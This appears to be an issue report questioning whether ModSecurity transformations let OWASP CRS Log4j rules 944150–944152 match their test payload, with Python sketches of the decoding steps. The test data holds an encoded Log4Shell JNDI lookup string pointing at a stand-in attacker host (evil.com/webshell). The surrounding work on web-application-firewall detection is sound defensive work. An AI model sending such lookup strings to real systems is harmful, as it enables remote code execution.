Understanding `htmlEntityDecode` within Log4j Rules `944150-16`, `944151-16` and `944152-16`

I have come across a bit of an issue with the following rules and tests:
- 944150 (944150-16)
- 944151 (944151-16)
- 944152 (944152-16)

The rules are nearly identical apart from their regexes.

The tests are also identical, and rely on the following JSON to match:
```json
{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}
```

The rules all run the following transformation functions:
- urlDecodeUni
- jsDecode
- htmlEntityDecode

The value of the JSON string after each transformation is as follows:

After `urlDecodeUni`:
```json
{"foo": "\u002524{jndi:ldap://evil.com/webshell}"}
```
After `jsDecode`:
```json
{"foo": "%24{jndi:ldap://evil.com/webshell}"}
```
Running `htmlEntityDecode` after that does not decode anything.
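
To make the walk-through above easy to reproduce, here is a minimal Python sketch of the three steps. The helper names are hypothetical and the functions are only rough stand-ins for the ModSecurity transformations (for example, `js_decode` handles only `\uHHHH` escapes). It also assumes the transformations see the string exactly as written in the test:

```python
import html
import re
from urllib.parse import unquote

# Test payload as written in the test (raw string keeps the literal \u0025).
body = r'{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}'

def url_decode(s: str) -> str:
    # Rough stand-in for urlDecodeUni: decodes %HH sequences only.
    return unquote(s)

def js_decode(s: str) -> str:
    # Rough stand-in for jsDecode: handles only \uHHHH escapes.
    return re.sub(r'\\u([0-9a-fA-F]{4})',
                  lambda m: chr(int(m.group(1), 16)), s)

def html_entity_decode(s: str) -> str:
    # Rough stand-in for htmlEntityDecode, using Python's HTML5 unescaping.
    return html.unescape(s)

step1 = url_decode(body)
step2 = js_decode(step1)
step3 = html_entity_decode(step2)

for name, value in [("urlDecodeUni", step1),
                    ("jsDecode", step2),
                    ("htmlEntityDecode", step3)]:
    print(f"{name}: {value}")
```

Under these assumptions the final value still contains `%24` rather than `$`.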

Based on that, none of the regexes should match the transformed string.

Based on our understanding of [the spec](https://html.spec.whatwg.org/#character-references), there are no HTML entities left in the above to decode.
The match fails because of the `%24`, which needs to be URL decoded into a `$`. HTML entity decoding would only work if the value were `&#x24;` or `&#36;` (as in [the PHP implementation](https://www.php.net/manual/en/function.html-entity-decode.php)).
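
For reference, `$` is code point 0x24 (decimal 36), so the numeric character references for it are `&#x24;` and `&#36;`. A quick check using Python's `html.unescape`, which follows the HTML5 rules and is only an approximation of what ModSecurity or PHP do:

```python
import html

# Candidate encodings of "$" and what an HTML5 entity decoder makes of them.
candidates = ["%24", "&#x24;", "&#36;"]
decoded = {c: html.unescape(c) for c in candidates}

for raw, out in decoded.items():
    print(f"{raw!r} -> {out!r}")
```

The percent-encoded form passes through untouched, because it is not an HTML character reference at all.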

Reading the ModSecurity [docs for htmlEntityDecode](https://github.com/owasp-modsecurity/ModSecurity/wiki/Reference-Manual-%28v3.x%29#user-content-htmlEntityDecode), you might think that the `htmlEntityDecode` function decodes a bare `HH` directly, but the [code](https://github.com/owasp-modsecurity/ModSecurity/blob/a555e5a44573e50f04ad997b3b24c214c42f8e29/src/actions/transformations/html_entity_decode.cc#L41-L44) shows it looking for `&#` first.

My question is: should we add another URL decoding step after the JS and HTML decode functions (or even in between them)?
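
As a rough illustration of what an extra URL decoding pass would change, the sketch below applies one to the post-`jsDecode` value. The `probe` pattern is a hypothetical simplification, not one of the actual rule regexes, and `unquote` is only a stand-in for `urlDecodeUni`:

```python
import re
from urllib.parse import unquote

# Value after urlDecodeUni and jsDecode, as shown in the walk-through.
after_js_decode = '{"foo": "%24{jndi:ldap://evil.com/webshell}"}'

# Hypothetical, simplified probe: just looks for a literal "${jndi:".
probe = re.compile(r'\$\{jndi:')

matched_before = probe.search(after_js_decode) is not None

# Second URL decoding pass turns %24 into "$".
second_pass = unquote(after_js_decode)
matched_after = probe.search(second_pass) is not None

print(matched_before, matched_after)
```

With the second pass the `$` is restored and a pattern of this shape can match.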

All of the regexes search for a `$`, and in this test string the dollar sign remains URL encoded after all three transformations, so I am wondering how this test passes, or is meant to pass, in its current form.
